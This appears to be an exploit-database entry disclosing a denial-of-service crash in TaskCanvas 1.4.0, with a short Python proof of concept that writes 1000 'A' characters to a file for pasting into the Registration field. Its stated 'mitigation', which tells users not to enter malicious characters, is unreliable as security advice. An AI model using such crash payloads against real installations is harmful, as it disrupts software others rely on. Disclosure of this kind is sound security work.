header-logo
Suggest Exploit
vendor:
TaskCanvas
by:
Ismail Tasdelen
7.5
CVSS
HIGH
Denial Of Service
400
CWE
Product Name: TaskCanvas
Affected Version From: 1.4.0
Affected Version To: 1.4.0
Patch Exists: NO
Related CWE: N/A
CPE: a:digital_volcano:taskcanvas
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2020

TaskCanvas 1.4.0 – ‘Registration’ Denial Of Service

TaskCanvas 1.4.0 is vulnerable to Denial of Service attack when a malicious user sends a large amount of characters in the 'Registration' field. This causes the application to crash.

Mitigation:

The user should not enter any malicious characters in the 'Registration' field.
Source

Exploit-DB raw data:

# Exploit Title: TaskCanvas 1.4.0 - 'Registration' Denial Of Service
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : https://www.digitalvolcano.co.uk/
# Link Software : https://www.digitalvolcano.co.uk/taskcanvasdownload.html
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1.Download and install TaskCanvas
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Registration -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Registration' and click on 'Ok'
6.TaskCanvas Crashed
'''

#!/usr/bin/python
    
buffer = "A" * 1000
 
payload = buffer
try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")